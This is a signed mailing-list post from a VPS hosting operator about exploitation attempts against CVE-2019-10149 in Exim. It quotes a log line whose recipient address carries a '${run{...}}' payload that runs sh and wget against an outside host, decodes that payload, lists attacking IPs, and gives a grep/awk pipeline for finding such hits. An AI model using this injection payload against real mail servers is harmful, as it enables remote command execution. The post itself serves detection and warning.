gpg: Signature made Sun Jun 23 03:24:51 2019 UTC
gpg: using DSA key 2099B64CBF15490B
gpg: Good signature from "Andy Smith <andy@strugglers.net>" [unknown]
gpg: aka "Andrew James Smith <andy@strugglers.net>" [unknown]
gpg: aka "Andy Smith (UKUUG) <andy.smith@ukuug.org>" [unknown]
gpg: aka "Andy Smith (BitFolk Ltd.) <andy@bitfolk.com>" [unknown]
gpg: aka "Andy Smith (Linux User Groups UK) <andy@lug.org.uk>" [unknown]
gpg: aka "Andy Smith (Cernio Technology Cooperative) <andy.smith@cernio.com>" [unknown]
Hello,
I've just ran a grep on all of my mail logs for the string "run{" to
see who's been trying to exploit CVE-2019-10149. A successful match
looks like this on my MTA (Exim):
2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support@???> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}@???>: Unrouteable address
This appears to be attempting to execute:
sh -c "wget 64.50.180.45/tmp/85.119.82.70
on my host. I assume that the attacker watches their HTTP logs for
requests for /tmp/85.119.82.70 and then they know they've found an
exploitable host.
Here's a list of offenders sorted by attempt count:
Count Attacker Country AS
-------------------------------------------------------------------------------------------------
18 89.248.171.57 ( scanner20.openportstats.com) NL INT-NETWORK, SC [AS202425]
8 163.172.157.143 (143-157-172-163.rev.cloud.scaleway.com) GB AS12876, FR [AS12876]
6 104.237.134.176 (li810-176.members.linode.com) US LINODE-AP Linode, LLC, US [AS63949]
3 149.56.142.192 ( 192.ip-149-56-142.net) CA OVH, FR [AS16276]
3 104.200.137.239 ( mx239.odesktrack.com) US TOTAL-SERVER-SOLUTIONS - Total Server Solutions L.L.C., US [AS46562]
2 27.69.172.229 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552]
1 95.139.230.110 (node-110-230-139-95.domolink.tula.net) RU ROSTELECOM-AS, RU [AS12389]
1 79.173.123.131 ( Unset reverse DNS) RU TKTOR, RU [AS44270]
1 46.150.228.178 ( Unset reverse DNS) RU ABRIKOS-AS, RU [AS196768]
1 27.70.156.161 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552]
1 27.69.172.239 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552]
1 27.69.172.214 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552]
Most worrying, a BitFolk IP was amongst my findings. i.e. there is a
BitFolk customer VPS also doing this. Most likely they have already
been compromised by this technique. I've removed them from the
results above but I expect if you search your own logs you'll find
them. They have already been notified.
I created the above output with this script:
https://gist.github.com/grifferz/f92a9c885443a0db8776c4f2f10f914f
To use it in this case would be something like:
$ zcat -f /var/log/exim4/mainlog* \
| grep "run{" \
| awk -F'[' '{ gsub(/\].*/, "", $2); print $2 }' \
| sort | uniq -c | sort -rn | ~/attackers.sh
The awk is separating an IP address out of the [1.2.3.4]. The
sort/uniq/sort is generating an event count. attackers.sh is merely
getting extra info about the IP address.
Cheers,
Andy
--
https://bitfolk.com/ -- No-nonsense VPS hosting
